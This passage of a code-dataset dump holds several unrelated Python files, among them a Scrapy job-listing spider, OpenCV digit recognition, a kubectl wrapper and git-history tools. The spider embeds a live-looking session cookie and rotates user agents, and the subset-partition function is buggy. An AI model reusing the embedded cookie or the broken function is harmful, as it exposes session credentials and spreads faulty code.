destination_dir)\n\n","sub_path":"scripts/txtMine_scripts/run_w2v_pipeline.py","file_name":"run_w2v_pipeline.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"173583651","text":"from scrapy.linkextractors import LinkExtractor\nfrom scrapy.spider import CrawlSpider, Rule\nfrom .mytools import Mytools\nfrom ..items import LagouJobItemLoader, LagouJobItem\nimport datetime\n\n\nclass LagouSpider(CrawlSpider):\n name = 'lagou'\n allowed_domains = ['www.lagou.com']\n start_urls = ['http://www.lagou.com/']\n\n rules = (\n Rule(LinkExtractor(allow=r\"zhaopin/.*\"), follow=True),\n Rule(LinkExtractor(allow=r\"gongsi/j\\d+.html\"), follow=True),\n Rule(LinkExtractor(allow=r'jobs/\\d+.html'), callback='parse_job', follow=True)\n )\n\n\n custom_settings = {\n 'COOKIES_ENABLED': False,\n \"DOWNLOAD_DELAY\": 0.5,\n 'DEFAULT_REQUEST_HEADERS': {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n 'Connection': 'keep-alive',\n 'DNT': '1',\n 'Host': 'www.lagou.com',\n 'Upgrade-Insecure-Requests': '1',\n 'Cookie': 'JSESSIONID=ABAAABAAADEAAFIBCD44E138F7B16FC70E4AA46B109801F; _ga=GA1.2.948320197.1534851127; user_trace_token=20180821193209-d7564b6c-a535-11e8-ab1f-5254005c3644; LGUID=20180821193209-d7564f40-a535-11e8-ab1f-5254005c3644; index_location_city=%E6%88%90%E9%83%BD; _gid=GA1.2.180925300.1536590785; TG-TRACK-CODE=hpage_code; X_HTTP_TOKEN=c935a49c0e8f02628c7ea7eb3acdadce; SEARCH_ID=b370a10d410d4b99bcb384ae52c15057; Hm_lvt_4233e74dff0ae5bd0a3d81c6ccf756e6=1534851129,1535022796,1536594353; Hm_lpvt_4233e74dff0ae5bd0a3d81c6ccf756e6=1536594353; LGRID=20180910234553-9989d7fa-b510-11e8-8d59-525400f775ce'\n },\n 'DOWNLOADER_MIDDLEWARES': {\n # user-agent代理\n 'ArticleSpider.middlewares.RandomUserAgentMiddleware': 2,\n # ip代理\n # 'ArticleSpider.middlewares.RandomIpProxyMiddleware': 3,\n # 'ArticleSpider.middlewares.JSPageMiddleware': 3,\n }\n }\n\n def parse_job(self, response):\n date = datetime.datetime.now().date()\n item_loader = LagouJobItemLoader(item=LagouJobItem(), response=response)\n item_loader.add_xpath('title', '//*[@class=\"job-name\"]/@title')\n item_loader.add_value('url', response.url)\n item_loader.add_value('url_object_id', Mytools.get_md5(response.url))\n item_loader.add_xpath('salary', '//*[@class=\"job_request\"]/p/span[1]/text()')\n item_loader.add_xpath('job_city', '//*[@class=\"job_request\"]/p/span[2]/text()')\n item_loader.add_xpath('work_years', '//*[@class=\"job_request\"]/p/span[3]/text()')\n item_loader.add_xpath('degree_need', '//*[@class=\"job_request\"]/p/span[4]/text()')\n item_loader.add_xpath('job_type', '//*[@class=\"job_request\"]/p/span[5]/text()')\n item_loader.add_xpath('publish_time', '//*[@class=\"publish_time\"]/text()')\n item_loader.add_xpath('job_advantage', '//*[@class=\"job-advantage\"]/p/text()')\n item_loader.add_xpath('job_addr', '//*[@class=\"work_addr\"]/a/text()')\n item_loader.add_xpath('company_url', '//*[@id=\"job_company\"]/dt/a/@href')\n item_loader.add_xpath('company_name', '//*[@id=\"job_company\"]/dt/a/img/@alt')\n item_loader.add_xpath('tags', '//*[contains(@class,\"position-label\")]/li/text()')\n item_loader.add_value('crawl_time', date)\n item_loader.add_xpath('job_desc', '//*[@class=\"job_bt\"]/div/p/text()')\n # item_loader.add_value('crawl_update_time', date)\n job_item = item_loader.load_item()\n\n return job_item\n","sub_path":"ArticleSpider/spiders/lagou.py","file_name":"lagou.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"576238321","text":"\"\"\"\nThe tables Blueprint handles the page views for each database table.\nSpecifically, it provides an html table to visualize the information.\nIt also allows users to add to, and edit the information.\n\"\"\"\nfrom flask import Blueprint\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nimport re\n\ntables_bp = Blueprint('tables', __name__, url_prefix='/tables',\n template_folder='templates')\n\n@tables_bp.app_template_filter()\ndef titleize(text):\n # replace underscores with spaces and titlecase the words\n return text.replace(\"_\", \" \").title()\n\n@tables_bp.app_template_filter()\ndef data_format(data, column):\n # convert money data stored as cents to dollars\n if column in ['price', 'total']:\n return \"${:,.2f}\".format((data/100))\n elif 'age' in column:\n years = data.years\n months = data.months\n days = data.days\n return \"{} years, {} months, {} days\".format(years, months, days)\n elif 'date' in column or column in ['arrived', 'finished', 'filled', 'emptied']:\n data = data.strftime(\"%m/%d/%Y\")\n elif column in ['proof_gal', 'pg_remaining']:\n return \"{:.2f}\".format((data/100))\n elif column == 'table':\n return titleize(data)\n elif column == 'product':\n if re.search(r'\\dl$', data):\n data = data[:-1]\n return \"{}L\".format(data)\n else:\n return data\n elif column == \"mash_number\":\n return data.upper()\n return data\n\nfrom . import routes\n","sub_path":"app/tables/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"84817751","text":"import cv2 \nimport numpy as np\nfrom keras.models import load_model\n\nimg_color = cv2.imread('./data/pred/pred.jpg', cv2.IMREAD_COLOR) \nimg_gray = cv2.cvtColor( img_color, cv2.COLOR_BGR2GRAY) \n\n\nret, img_binary = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU ) \n\nkernel = cv2.getStructuringElement( cv2.MORPH_RECT, (5, 5)) \nimg_binary = cv2.morphologyEx(img_binary, cv2.MORPH_CLOSE, kernel)\n'''\ncv2.imshow('digit', img_binary)\ncv2.waitKey(0) \n'''\ncontours, hierarchy = cv2.findContours(img_binary, cv2.RETR_EXTERNAL, \n cv2.CHAIN_APPROX_SIMPLE)\n\ncv2.drawContours(img_color, contours, -1, (0, 255, 0), 1) # -1 = 모든 컨투어 그림/ 1 = 선의 두께\n\n\nfor contour in contours:\n\n x, y, w, h = cv2.boundingRect(contour) \n\n length = max(w, h) + 60 \n img_digit = np.zeros((length, length, 1), np.uint8) \n \n\n new_x, new_y = x - (length - w)//2, y-(length - h)//2 \n\n img_digit = img_binary[new_y : new_y + length, new_x:new_x + length] \n\n kernel = np.ones((5, 5), np.uint8) \n img_digit = cv2.morphologyEx(img_digit, cv2.MORPH_DILATE, kernel) \n\n cv2.imshow('digit', img_digit)\n cv2.waitKey(0) \n\n model = load_model('./mini_project/graph/model1.h5') \n\n img_digit = cv2.resize(img_digit, (256, 256), interpolation = cv2.INTER_LINEAR)\n \n\n img_digit = cv2.cvtColor( img_digit, cv2.COLOR_GRAY2BGR)\n\n img_digit = img_digit /255.0 \n\n img_input = img_digit.reshape(1, 256, 256, 3) \n predictions = model.predict(img_input) \n\n number = np.argmax(predictions) \n print(number)\n\n cv2.rectangle(img_color, (x, y), (x+w, y+h), (255, 255, 0), 2) \n\n location = (x + int(w *0.5), y -10) \n font = cv2.FONT_HERSHEY_COMPLEX\n fontScale = 1.2\n cv2.putText(img_color, str(number), location, font, fontScale, (0, 255, 0), 2)\n\n cv2.imshow('digit', img_digit) \n cv2.waitKey(0)\n\n# for문 빠져나옴\n\ncv2.imshow('result', img_color) \ncv2.waitKey(0)","sub_path":"project/project01_ingred_recipe/opencv01_contour2.py","file_name":"opencv01_contour2.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"588358091","text":"def can_partition(nums):\n def helper(nums, dp, sum, index):\n if sum == 0:\n return 1\n n = len(nums)\n if n == 0 or index >= n:\n return 0\n if dp[index][sum] == -1:\n if nums[index] <= sum:\n if helper(nums, dp, sum - nums[index], index + 1) == 1:\n dp[index][sum] = 1\n return 1\n dp[index][sum] = helper(nums, dp, sum, index + 1)\n return dp[index][sum]\n s= sum(nums)\n dp = [[-1 for _ in range((s/2)+1)] for _ in range(len(nums))]\n print(dp)\n if sum(nums) % 2 != 0:\n return False\n return True if helper(nums, dp, int(sum(nums) / 2), 0) == 1 else False\n","sub_path":"src/01knapsack_pattern/equal_subset_sum_partition/top_down.py","file_name":"top_down.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"619682479","text":"# Copyright 2014 Google Inc. All Rights Reserved.\n\n\"\"\"Passthrough command for calling kubectl from gcloud.\"\"\"\nimport argparse\n\nfrom googlecloudsdk.calliope import actions\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.calliope import exceptions\nfrom googlecloudsdk.container.lib import kubeconfig as kconfig\nfrom googlecloudsdk.container.lib import util\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\nfrom googlecloudsdk.core.util import platforms\nfrom googlecloudsdk.core.util.compat26 import subprocess\n\n\nKUBECTL_TIMEOUT_ERR = 'connection timed out'\nKUBECTL_TLS_ERR = 'certificate signed by unknown authority'\n\n\ndef WhichKubectl():\n try:\n return subprocess.check_output(['which', 'kubectl'])\n except subprocess.CalledProcessError:\n return None\n\n\nDEPRECATION_WARNING = '''\\\nThis command is deprecated. Use kubectl directly with the cluster.\n{use_context}\nkubectl {args}\n'''\n\n\nclass Kubectl(base.Command):\n \"\"\"Pass-through command to call kubectl with arbitrary arguments.\n\n See https://cloud.google.com/container-engine/docs/kubectl for\n kubectl documentation.\n \"\"\"\n\n @staticmethod\n def Args(parser):\n \"\"\"Register flags for this command.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order\n to capture some information, but behaves like an ArgumentParser.\n \"\"\"\n parser.add_argument(\n '--purge-config-cache',\n help='Clear cached config data for the cluster. If set, will call '\n '\\'container clusters describe\\' directly to get cluster data before '\n 'executing kubernetes client command.',\n action='store_true')\n parser.add_argument(\n '--cluster', '-n',\n help='The name of the cluster to issue commands to.',\n action=actions.StoreProperty(properties.VALUES.container.cluster))\n parser.add_argument(\n 'kubectl_args',\n nargs=argparse.REMAINDER,\n help='Arbitrary arguments to pass to kubectl')\n\n def LoadClusterConfig(self, args):\n \"\"\"Load and return ClusterConfig prior to calling a kubectl command.\n\n Args:\n args: an argparse namespace. All the arguments that were provided to this\n command invocation.\n\n Returns:\n ClusterConfig for the project,zone,cluster specified by args/properties.\n\n Raises:\n util.Error: if container API reports cluster is not running.\n \"\"\"\n name = properties.VALUES.container.cluster.Get(required=True)\n cluster_ref = util.ParseCluster(name, self.context)\n\n c_config = util.ClusterConfig.Load(\n cluster_ref.clusterId, cluster_ref.zoneId, cluster_ref.projectId)\n if args.purge_config_cache:\n util.ClusterConfig.Purge(\n cluster_ref.clusterId, cluster_ref.zoneId, cluster_ref.projectId)\n c_config = None\n\n if not c_config or not c_config.has_certs:\n log.status.Print('Fetching cluster endpoint and auth data.')\n # Call DescribeCluster to get auth info and cache for next time\n cluster = util.DescribeCluster(cluster_ref, self.context)\n messages = self.context['container_messages']\n if cluster.status != messages.Cluster.StatusValueValuesEnum.running:\n raise util.Error('cluster %s is not running' % cluster_ref.clusterId)\n c_config = util.ClusterConfig.Persist(\n cluster, cluster_ref.projectId, self.cli)\n return c_config\n\n def CallKubectl(self, c_config, kubectl_args):\n \"\"\"Shell out to call to kubectl tool.\n\n Args:\n c_config: ClusterConfig object for cluster.\n kubectl_args: specific args to call kubectl with (not including args\n for authentication).\n Returns:\n (output, error), where\n output: str, raw output of the kubectl command.\n error: subprocess.CalledProcessError, if the command exited with\n non-zero status, None if command exited with success.\n \"\"\"\n base_args = [\n '--kubeconfig=%s' % kconfig.Kubeconfig.DefaultPath(),\n '--context=%s' % c_config.kube_context,\n ]\n if not c_config.has_certs:\n log.warn('No certificate files found in %s. Certificate checking '\n 'disabled for calls to cluster master.', c_config.config_dir)\n args = ['kubectl'] + base_args + kubectl_args\n try:\n log.debug('Calling \\'%s\\'', repr(args))\n output = subprocess.check_output(args, stderr=subprocess.STDOUT)\n return (output, None)\n except subprocess.CalledProcessError as error:\n return (error.output, error)\n\n @exceptions.RaiseToolExceptionInsteadOf(util.Error)\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command.\n\n Args:\n args: an argparse namespace. All the arguments that were provided to this\n command invocation.\n\n Returns:\n (output, error), where\n output: str, raw output of the kubectl command.\n error: subprocess.CalledProcessError, if the command exited with\n non-zero status, None if command exited with success.\n\n Raises:\n util.Error: if the current platform is not supported by kubectl.\n \"\"\"\n local = platforms.Platform.Current()\n if local.operating_system == platforms.OperatingSystem.WINDOWS:\n raise util.Error(\n 'This command requires the kubernetes client (kubectl), which is '\n 'not available for Windows at this time.')\n if not WhichKubectl():\n raise util.Error(\n 'This command requires the kubernetes client (kubectl), which is '\n 'installed with the default gcloud components. Run '\n '\\'gcloud components update\\', or make sure kubectl is '\n 'installed somewhere on your path.')\n\n cluster_config = self.LoadClusterConfig(args)\n # Print deprecation warning, including command to switch context, if needed\n kubeconfig = kconfig.Kubeconfig.Default()\n use_context = ''\n if kubeconfig.current_context != cluster_config.kube_context:\n use_context = '\\nkubectl config use-context '+cluster_config.kube_context\n log.warn(DEPRECATION_WARNING.format(\n use_context=use_context, args=' '.join(args.kubectl_args)))\n\n output, error = self.CallKubectl(cluster_config, args.kubectl_args)\n # If error looks like stale config, try refetching cluster config\n if error and (KUBECTL_TLS_ERR in output or\n KUBECTL_TIMEOUT_ERR in output):\n log.warn(\n 'Command failed with error: %s. Purging config cache and retrying'\n % error.output)\n args.purge_config_cache = True\n cluster_config = self.LoadClusterConfig(args)\n output, error = self.CallKubectl(cluster_config, args.kubectl_args)\n return output, error\n\n def Display(self, args, result):\n \"\"\"This method is called to print the result of the CallKubectl method.\n\n Args:\n args: The arguments that command was run with.\n result: The value returned from the CallKubectl method.\n \"\"\"\n output, error = result\n if error:\n log.debug('kubectl command %s returned non-zero exit status %d',\n error.cmd, error.returncode)\n log.error(output)\n self.exit_code = error.returncode\n else:\n log.out.Print(output)\n\nKubectl.detailed_help = {\n 'brief': 'Call kubectl with arbitrary arguments.',\n 'DESCRIPTION': \"\"\"\\\n Passes given arguments to kubectl along with arguments\n to set the cluster context (overwriting yourself is not recommended).\n Requires the compute/zone and container/cluster properties\n be defined. If they are missing, the command will fail with an error\n message that describes how to set the missing property.\n\n WARNING: this command is deprecated! You can run kubectl directly\n after calling\n\n $ gcloud alpha container get-credentials\n\n You can then use\n\n $ kubectl config use-context {context}\n\n to switch between clusters.\n \"\"\".format(\n context=util.ClusterConfig.KUBECONTEXT_FORMAT.format(\n project='PROJECT', zone='ZONE', cluster='CLUSTER'))\n}\n\n","sub_path":"sdk/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/container/commands/kubectl.py","file_name":"kubectl.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"356646704","text":"# _*_ coding: utf_8 _*_\n# search score \nimport logging\nimport os,openpyxl,pprint,re\n\nlogging.basicConfig( level = logging.DEBUG, format = ' %(asctime)s - %(levelname)s - %(message)s' )\n\nreg = r'\\d{7}[zZ]?' # reg = '1510401' \nclassRegex = re.compile(reg)\n\nlogging.info('classRegex is:%s', classRegex)\n\nfiles = ['模拟电路课程设计-1510401z.xlsx','认识实习1520603-外教.xlsx','电路与电子技术(核工)-1510401.xlsx']\n\nfor file in files:\n logging.info(file)\n a = re.findall(classRegex,file) # a = classRegex.search(file)\n if(a):\n logging.info('class that is found is:'+ str(a))\n print(file)\n \n","sub_path":"re_test1.py","file_name":"re_test1.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"140704409","text":"import pandas as pd\nfrom scipy import stats\n\n\ndef rna_protein_correlation(feature_count_table, feature_count_start_column, feature_count_end_column, protein_table,\n protein_count_start_column, protein_count_end_column,\n output_file):\n sequencing_table = pd.read_table(feature_count_table)\n protein_table = pd.read_table(protein_table)\n sequencing_table.set_index('Gene', inplace=True)\n protein_table.set_index('Protein.IDs', inplace=True)\n value_matrix_sequencing = _extract_value_matrix(sequencing_table, feature_count_start_column,\n feature_count_end_column)\n value_matrix_protein = _extract_value_matrix(protein_table, protein_count_start_column, protein_count_end_column)\n correlation(value_matrix_sequencing, value_matrix_protein, output_file)\n\n\ndef _extract_value_matrix(feature_count_table_df, feature_count_start_column, feature_count_end_column):\n return feature_count_table_df.iloc[:, int(feature_count_start_column):int(feature_count_end_column)]\n\n\ndef correlation(value_matrix_sequencing, value_matrix_protein, output_file):\n correlation_dataframe = pd.DataFrame(0, columns=value_matrix_sequencing.index, index=value_matrix_protein.index)\n # i = 0\n for index_gene, row_gene in value_matrix_sequencing.iterrows():\n # i = i + 1\n # print(str(i) + \": \" + index_gene)\n # if i == 2:\n # break\n for index_protein, row_protein in value_matrix_protein.iterrows():\n rho = stats.spearmanr(row_gene, row_protein)[0]\n correlation_dataframe.loc[index_protein, index_gene] = rho\n # print(correlation_dataframe.loc[index_protein, index_gene])\n\n correlation_dataframe.to_csv(output_file, sep='\\t')\n","sub_path":"graditudelib/correlation_rna_protein.py","file_name":"correlation_rna_protein.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"235986298","text":"from gensim.models import word2vec\nimport gensim\nimport os\nimport logging\nimport jieba\nimport jieba.analyse\n\n\n# 此函数作用是对初始语料进行分词处理后,作为训练模型的语料\ndef cut_txt(old_file):\n cut_file = old_file + '_cut.txt'\n\n try:\n fi = open(old_file, 'r', encoding='utf-8')\n except BaseException as e: # 因BaseException是所有错误的基类,用它可以获得所有错误类型\n print(Exception, \":\", e) # 追踪错误详细信息\n\n text = fi.read() # 获取文本内容\n new_text = jieba.cut(text, cut_all=False) # 精确模式\n str_out = (\n ' '.join(new_text)\n .replace(',', '')\n .replace('。', '')\n .replace('?', '')\n .replace('!', '')\n .replace('“', '')\n .replace('”', '')\n .replace(':', '')\n .replace('…', '')\n .replace('(', '')\n .replace(')', '')\n .replace('—', '')\n .replace('《', '')\n .replace('》', '')\n .replace('、', '')\n .replace('‘', '')\n .replace('’', '')\n ) # 去掉标点符号\n fo = open(cut_file, 'w', encoding='utf-8')\n fo.write(str_out)\n\n\ndef model_train(\n train_file_name, save_model_file\n): # model_file_name为训练语料的路径,save_model为保存模型名\n # 模型训练,生成词向量\n logging.basicConfig(\n format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO\n )\n sentences = word2vec.Text8Corpus(train_file_name) # 加载语料\n model = gensim.models.Word2Vec(sentences, size=200) # 训练skip-gram模型; 默认window=5\n model.save(save_model_file)\n model.wv.save_word2vec_format(\n save_model_file + \".bin\", binary=True\n ) # 以二进制类型保存模型以便重用\n\n\n# 训练\ndef train(save_model_name, cut_file):\n if not os.path.exists(save_model_name): # 判断文件是否存在\n model_train(cut_file, save_model_name)\n else:\n print('此训练模型已经存在,不用再次训练')\n\n\ndef test1(save_model_name, str1, str2):\n # 加载已训练好的模型\n model_1 = word2vec.Word2Vec.load(save_model_name)\n # 计算两个词的相似度/相关程度\n y1 = model_1.similarity(str1, str2)\n print(str1 + \"和\" + str2 + \"的相似度为:\", y1)\n print(\"-------------------------------\\n\")\n\n\ndef test2(save_model_name, str1):\n model_1 = word2vec.Word2Vec.load(save_model_name)\n # 计算某个词的相关词列表\n y2 = model_1.most_similar(str1, topn=10) # 10个最相关的\n print(u\"和\" + str1 + \"最相关的词有:\\n\")\n for item in y2:\n print(item[0], item[1])\n print(\"-------------------------------\\n\")\n\n return y2\n\n\ndef print_str(file, key_words):\n with open(file, 'r', encoding='utf-8') as opener:\n lines = opener.readlines()\n for key_word in key_words:\n print(\"\\n\" + \"\\n\" + \"\\n\")\n k_1 = key_word[0]\n print(k_1)\n for line in lines:\n if k_1 in line:\n print(line)\n\n\nif __name__ == '__main__':\n # cut_txt('JD_before.txt') # 须注意文件必须先另存为utf-8编码格式\n # train('JD_before.model','JD_before.txt_cut.txt')\n # test1('JD_before.model',\"京东\",\"品牌\")\n val = input(\"输入:\")\n # 关键词\n key_words = test2('JD_before.model', val)\n print_str('JD.txt', key_words)\n","sub_path":"jieba分词/word2vec_demo.py","file_name":"word2vec_demo.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"562165817","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 24 15:39:01 2018\n\n@author: suvod\n\"\"\"\n\nfrom pygit2 import clone_repository\nfrom pygit2 import GIT_SORT_TOPOLOGICAL, GIT_SORT_REVERSE,GIT_MERGE_ANALYSIS_UP_TO_DATE,GIT_MERGE_ANALYSIS_FASTFORWARD,GIT_MERGE_ANALYSIS_NORMAL,GIT_RESET_HARD\nfrom pygit2 import Repository\nimport shutil,os\nimport pygit2\nimport re\nfrom main.utils.utils import utils\nfrom os import listdir\nfrom os.path import isfile, join\nfrom datetime import datetime\nimport platform\nimport threading\nfrom multiprocessing import Queue\nfrom threading import Thread\nimport numpy as np\nimport itertools\nimport pandas as pd\nfrom multiprocessing import Pool, cpu_count\nfrom os.path import dirname as up\n\nclass ThreadWithReturnValue(Thread):\n def __init__(self, group=None, target=None, name=None,\n args=(), kwargs={}, Verbose=None):\n Thread.__init__(self, group, target, name, args, kwargs)\n self._return = None\n def run(self):\n #print(type(self._target))\n if self._target is not None:\n self._return = self._target(*self._args,\n **self._kwargs)\n def join(self, *args):\n Thread.join(self, *args)\n return self._return\n\nclass get_all_branches(object):\n \n def __init__(self,repo_url,repo_name):\n self.repo_url = repo_url\n self.repo_name = repo_name\n self.commit = []\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n self.repo_path = up(up(os.getcwd())) + '/temp_repo/' + repo_name\n else:\n self.repo_path = up(up(os.getcwd())) + '\\\\temp_repo\\\\' + repo_name\n self.clone_repo()\n \n \n def clone_repo(self):\n git_path = pygit2.discover_repository(self.repo_path)\n if git_path is not None:\n self.repo = pygit2.Repository(git_path)\n return self.repo\n if not os.path.exists(self.repo_path):\n os.makedirs(self.repo_path)\n self.repo = clone_repository(self.repo_url, self.repo_path)\n return self.repo\n \n \n def get_branches(self):\n return list(self.repo.branches)\n\nclass git2repo(object):\n \n def __init__(self,repo_url,repo_name):\n self.repo_url = repo_url\n self.repo_name = repo_name\n self.repos = []\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n self.repo_path = os.getcwd() + '/temp_repo/' + repo_name\n else:\n self.repo_path = os.getcwd() + '\\\\temp_repo\\\\' + repo_name\n self.cores = cpu_count()\n \n def clone_repo(self):\n git_path = pygit2.discover_repository(self.repo_path)\n if git_path is not None:\n self.repo = pygit2.Repository(git_path)\n return self.repo\n if not os.path.exists(self.repo_path):\n os.makedirs(self.repo_path)\n self.repo = clone_repository(self.repo_url, self.repo_path)\n return self.repo\n\n def clone_branch(self,branch):\n repo_path = self.repo_path + '_' + branch\n git_path = pygit2.discover_repository(repo_path)\n if git_path is not None:\n self.repo = pygit2.Repository(git_path)\n return self.repo\n if not os.path.exists(repo_path):\n os.makedirs(repo_path)\n self.repo = clone_repository(self.repo_url, repo_path,checkout_branch = branch)\n return self.repo\n\n def clone_master_branch(self):\n repo_path = self.repo_path\n git_path = pygit2.discover_repository(repo_path)\n if git_path is not None:\n self.repo = pygit2.Repository(git_path)\n return self.repo\n if not os.path.exists(repo_path):\n os.makedirs(repo_path)\n self.repo = clone_repository(self.repo_url, repo_path,checkout_branch = 'master')\n return self.repo\n \n def get_branches(self):\n gb = get_all_branches(self.repo_url,self.repo_name)\n gb.clone_repo()\n return gb.get_branches()[1:]\n \n def repo_remove(self):\n self.repo.free()\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n deldir = self.repo_path + '/.git/objects/pack'\n else:\n deldir = self.repo_path + '\\\\.git\\\\objects\\\\pack'\n print(os.path.isfile(deldir))\n delFiles = [f for f in listdir(deldir) if isfile(join(deldir, f))]\n for i in delFiles:\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n file_name = deldir + '/' + i\n else:\n file_name = deldir + '\\\\' + i\n os.chmod(file_name, 0o777)\n if os.path.exists(self.repo_path):\n shutil.rmtree(self.repo_path,ignore_errors=True)\n \n def branch_remove(self,repo,path):\n repo.free()\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n deldir = path + '/.git/objects/pack'\n else:\n deldir = path + '\\\\.git\\\\objects\\\\pack'\n delFiles = [f for f in listdir(deldir) if isfile(join(deldir, f))]\n for i in delFiles:\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n file_name = deldir + '/' + i\n else:\n file_name = deldir + '\\\\' + i\n os.chmod(file_name, 0o777)\n if os.path.exists(path):\n shutil.rmtree(path,ignore_errors=True)\n \n \n def get_current_commit_objects(self):\n commits = []\n for commit in self.repo.walk(self.repo.head.target, GIT_SORT_TOPOLOGICAL | GIT_SORT_REVERSE):\n commits.append(commit)\n self.commit = commits\n return commits\n \n def get_commit_data(self,branch):\n commits = []\n repo = self.clone_branch(branch)\n path = self.repo_path + '_' + branch\n for commit in repo.walk(repo.head.target, GIT_SORT_TOPOLOGICAL | GIT_SORT_REVERSE):\n commits.append(commit)\n self.repos.append([repo,path]) \n return commits\n \n# def get_commit_objects(self):\n# commits = []\n# branches = self.get_branches()\n# self.repo_remove()\n# for branch in branches:\n# branch= branch.split(\"/\",1)[1]\n# repo = self.clone_branch(branch)\n# for commit in repo.walk(repo.head.target, GIT_SORT_TOPOLOGICAL | GIT_SORT_REVERSE):\n# commits.append(commit)\n# self.branch_remove(repo)\n# self.clone_repo()\n# self.commit = commits\n# print(len(commits))\n# return commits\n \n\n def get_commit_objects(self):\n commits = []\n threads = []\n commits = []\n branches = self.get_branches()\n self.repo_remove()\n for branch in branches:\n branch= branch.split(\"/\",1)[1]\n t = ThreadWithReturnValue(target = self.get_commit_data, args = [branch])\n threads.append(t)\n for i in range(0,len(threads),self.cores):\n _threads = threads[i:i+self.cores]\n for th in _threads:\n th.start()\n for th in _threads:\n response = th.join()\n commits.append(response)\n self.clone_repo()\n commits = list(itertools.chain.from_iterable(commits))\n temp = []\n for commit in commits:\n temp.append([commit.id.hex,commit])\n temp_df = pd.DataFrame(temp, columns = ['id','object'])\n temp_df.drop_duplicates(subset = ['id'], inplace = True)\n commits = temp_df['object'].tolist()\n self.commit = commits\n return commits\n \n# def get_committed_files(self,repo,commits):\n# committed_files = []\n# for i in range(len(commits)):\n# try:\n# if len(commits[i].parents) == 0: # need to handle this case where commit doesnot have a parent\n# continue\n# t0 = commits[i]\n# if i != 0:\n# t1 = commits[i].parents[0]\n# else:\n# continue\n# _diff = repo.diff(t1,t0)\n# for j in _diff.deltas:\n# committed_files.append([commits[i].id.hex,j.new_file.id.hex, j.new_file.mode,j.new_file.path])\n# except:\n# print(\"commit:\",commits[i].id)\n# continue\n# return committed_files\n \n def get_committed_files(self):\n committed_files = []\n commits = self.commit\n for i in range(len(commits)):\n try:\n if len(commits[i].parents) == 0: # need to handle this case where commit doesnot have a parent\n continue\n t0 = commits[i]\n if i != 0:\n t1 = commits[i].parents[0]\n else:\n continue\n _diff = self.repo.diff(t1,t0)\n for j in _diff.deltas:\n committed_files.append([commits[i].id.hex,j.new_file.id.hex, j.new_file.mode,j.new_file.path])\n except:\n print(\"commit:\",commits[i].id)\n continue\n for j in range(len(self.repos)):\n self.branch_remove(self.repos[j][0],self.repos[j][1])\n return committed_files\n \n def get_diffs(self,commits):\n diffs = {}\n for i in range(len(commits)):\n t0 = self.repo.get(commits[i])\n files = {}\n if len(t0.parents) == 0: # need to handle this case where commit doesnot have a parent\n continue\n if i != 0:\n t1 = t0.parents[0]\n else:\n continue\n _diff = self.repo.diff(t1,t0)\n for diff_i in _diff.__iter__():\n file_path = diff_i.delta.new_file.path\n old_lineno = []\n new_lineno = []\n for x in diff_i.hunks:\n for y in x.lines:\n old_lineno.append(y.old_lineno)\n new_lineno.append(y.new_lineno)\n files[diff_i.delta.new_file.id] = {'file_path':file_path, 'old_lines':old_lineno,'new_lines':new_lineno}\n diffs[t0.id] = {'files':files,'object':t0}\n return diffs\n \n def get_blame(self,file_path):\n return self.repo.blame(file_path,flags = 'GIT-BLAME_TRACK_COPIES_ANY_COMMIT_COPIES')\n \n \n def get_commits(self):\n _commits = self.get_current_commit_objects()\n commits = []\n for commit in _commits:\n commit_id = commit.id.hex\n commit_message = commit.message\n res=re.search(r'\\b{bug|fix|issue|error|correct|proper|deprecat|broke|optimize|patch|solve|slow|obsolete|vulnerab|debug|perf|memory|minor|wart|better|complex|break|investigat|compile|defect|inconsist|crash|problem|resol|#}\\b',utils().stemming(commit_message),re.IGNORECASE)\n if res is not None:\n commits_buggy = 1\n else:\n commits_buggy = 0\n if len(commit.parent_ids) == 0:\n commit_parent = None\n else:\n commit_parent = commit.parent_ids[0].hex\n commits.append([commit_id,commit_message,commit_parent,commits_buggy])\n return commits\n ","sub_path":"src/main/git_log/git2repo.py","file_name":"git2repo.py","file_ext":"py","file_size_in_byte":11281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"432763820","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/7/29 1:39\n# 